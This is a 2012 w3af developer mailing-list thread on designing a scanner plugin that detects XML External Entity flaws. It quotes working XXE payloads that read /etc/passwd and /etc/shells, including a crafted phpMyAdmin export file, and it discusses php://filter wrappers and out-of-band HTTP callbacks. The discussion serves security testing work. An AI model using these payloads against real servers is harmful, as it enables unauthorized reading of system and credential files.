Evgeny,
On Tue, Aug 28, 2012 at 9:39 AM, Evgeny Tolmachev
<etolmac...@ptsecurity.ru> wrote:
> Andres,
>
>> I think I understand what you're proposing here, but just to make things
>> clear: You want to include the http protocol in the XXE plugin in order to,
>> by starting an HTTP server on the box running w3af, be able to verify if the
>> target web application connects to it after sending the request?
>
> I have assumed 2 goals:
> 1) check - is it possible to made remote connection (like in LFI/RFI case) -
> as additional info
> 2) one of the way to detect existence of XXE, avoiding parsing output. But
> yes, it assumes working HTTP server.
Great, love both ideas,
>> Once again to make things clear, you want us to use base64 php wrappers to
>> avoid the contents of the file being read breaking the XML output and thus
>> breaking detection/exploitation?
> Note: Using base64 wrapper could be a good idea, but we also need to take
> care of all the other programming languages that don't support this.
>
> 2 goals too :)
> 1) Avoiding breaking some elements by output checking, etc.
Ok,
> 2) It made possible to use current script location (for ex, upload_xml.php)
> right php://filter/read=....../resourse=upload_xml.php ,
> avoiding full path to some "marker-file" (which can be not existing or have
> limited access rights, or depend on operating system, etc.).
> Think, that it could little increase possibility of detecting vulnerability
Not sure if I follow you here, what's the difference between:
file:upload_xml.php (please note that I'm not putting 3 /) , and
php://filter/read=.../resourse=upload_xml.php
The file protocol should be able to specify relative locations,
correct? After finishing this paragraph I tested it with Python and it
seems to work:
>>> import urllib2
>>> urllib2.urlopen('file:///etc/passwd').readlines()[0]
'root:x:0:0:root:/root:/bin/bash\n'
>>> urllib2.urlopen('file:w3af_console').readlines()[0] # file
>>> was in the same directory
'#!/usr/bin/env python\n'
>>>
But please note that it doesn't work with "file://"
>>> urllib2.urlopen('file://w3af_console').readlines()[0]
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python2.7/urllib2.py", line 126, in urlopen
...
urllib2.URLError: <urlopen error [Errno 2] No such file or directory: ''>
Regards,
>
>
> -----Original Message-----
> From: Andres Riancho [mailto:andres.rian...@gmail.com]
> Sent: Tuesday, August 28, 2012 4:10 PM
> To: Evgeny Tolmachev
> Cc: w3af-us...@lists.sourceforge.net; w3af-develop@lists.sourceforge.net;
> Carlos Pantelides; Achim Hoffmann; Taras P. Ivashchenko
> Subject: Re: [W3af-develop] Xml eXternal Entity
>
> Evgeny,
>
> On Tue, Aug 28, 2012 at 3:22 AM, Evgeny Tolmachev <etolmac...@ptsecurity.ru>
> wrote:
>> Hi, list.
>>
>> The latest one case which I had was XXE in PHPMyAdmin, which allow reading
>> files after export with special crafted *.xml file and exploit looked like
>> this:
>>
>> <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE ficheiro [
>> <!ENTITY xxe SYSTEM "file:///etc/shells" > ]> <pma_xml_export
>> version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/";>
>> <pma:structure_schemas>
>> <pma:database name="test" collation="utf8_general_ci" charset="utf8">
>> <pma:table name="test_tbl">
>> CREATE TABLE `test_tbl` (`file` varchar(20000) NOT NULL);
>> </pma:table>
>> </pma:database>
>> </pma:structure_schemas>
>> <database name="test">
>> <table name="test_tbl">
>> <column name="file">&xxe;</column>
>> </table>
>> </database>
>> </pma_xml_export>
>
> Hmm, that looks complex/impossible to detect with a web scanner, thanks for
> showing us more examples of this vulnerability!
>
>>
>> I think that it is totally not obvious thing to make detection of such
>> things in audit plugins implemented - due to logic of outputting the result
>> in table.
>
> Yep!
>
>> Andres, you wrote:
>>> So our audit plugin should send the xml with the external entity as the
>>> post-data to all URLs?
>> I think that this way can be used only in small count of cases where
>> content of files echoed right on the same page which was processed *.xml.
>> Also, I think that it has to be at least 2 checks - first one for
>> reading local file and another one for trying using some protocols - http,
>> for example, instead file:///.
>
> I think I understand what you're proposing here, but just to make things
> clear: You want to include the http protocol in the XXE plugin in order to,
> by starting an HTTP server on the box running w3af, be able to verify if the
> target web application connects to it after sending the request?
>
>> Except this, I think that firstly (before checking direct file:///) we
>> must to check possibility to read file using wrapper php:// and base64
>> convertation.
>
> Once again to make things clear, you want us to use base64 php wrappers to
> avoid the contents of the file being read breaking the XML output and thus
> breaking detection/exploitation?
>
> Note: Using base64 wrapper could be a good idea, but we also need to take
> care of all the other programming languages that don't support this.
>
>> So, I think, that checking process must be realized as minimum not only for
>> file:///.
>>
>>
>> -----Original Message-----
>> From: Andres Riancho [mailto:andres.rian...@gmail.com]
>> Sent: Tuesday, August 28, 2012 12:14 AM
>> To: w3af-us...@lists.sourceforge.net;
>> w3af-develop@lists.sourceforge.net; Carlos Pantelides; Achim Hoffmann;
>> Taras P. Ivashchenko
>> Subject: [W3af-develop] Xml eXternal Entity
>>
>> Lists,
>>
>> I've been playing around with the idea of writing an XXE [0] detection
>> plugin for w3af all evening, but I can't really decide if it is worth it.
>>
>> Have you guys seen these type of vulnerabilities in the wild? If so,
>> how? Most of the public vulnerabilities I see are exploited in this form:
>>
>> """
>> POST /xmlrpc_server.php HTTP/1.1
>> Host: $host
>>
>> <?xml version="1.0"?>
>> <!DOCTYPE foo [
>> <!ELEMENT methodName ANY >
>> <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <methodCall>
>> <methodName>&xxe;</methodName>
>> </methodCall>
>> """
>>
>> Which basically means that the vulnerable source code looks like:
>>
>> """
>> <?
>> ...
>> $xml = simplexml_load_file("php://input");
>> ...
>> echo $some_part_of_the_xml;
>> ?>
>> """
>>
>> So our audit plugin should send the xml with the external entity as the
>> post-data to all URLs? I can't find a realistic example where it would make
>> sense to send the custom-xml to one of these:
>>
>> - Query string parameter: http://host/index.aspx?id=<?xml...>
>> - HTML Form with url-encoding: http://host/index.aspx with post-data
>> name=<?xml...>&lastname=doe&age=32
>> - HTML Form with file input, where the uploaded file contains the XML
>> (could... maybe work in some cases... but most likely the /etc/passwd file
>> won't be echoed back in the response).
>>
>> What do you think? Ideas?
>>
>> [0]
>> https://www.owasp.org/index.php/Testing_for_XML_Injection_%28OWASP-DV-
>> 008%29
>>
>> Regards,
>> --
>> Andrés Riancho
>> Project Leader at w3af - http://w3af.org/ Web Application Attack and
>> Audit Framework
>> Twitter: @w3af
>> GPG: 0x93C344F3
>>
>> ----------------------------------------------------------------------
>> --------
>> Live Security Virtual Conference
>> Exclusive live event will cover all the ways today's security and
>> threat landscape has changed and how IT managers can respond.
>> Discussions will include endpoint security, mobile security and the
>> latest in malware threats.
>> http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> _______________________________________________
>> W3af-develop mailing list
>> W3af-develop@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/w3af-develop
>
>
>
> --
> Andrés Riancho
> Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit
> Framework
> Twitter: @w3af
> GPG: 0x93C344F3
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
W3af-develop mailing list
W3af-develop@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/w3af-develop
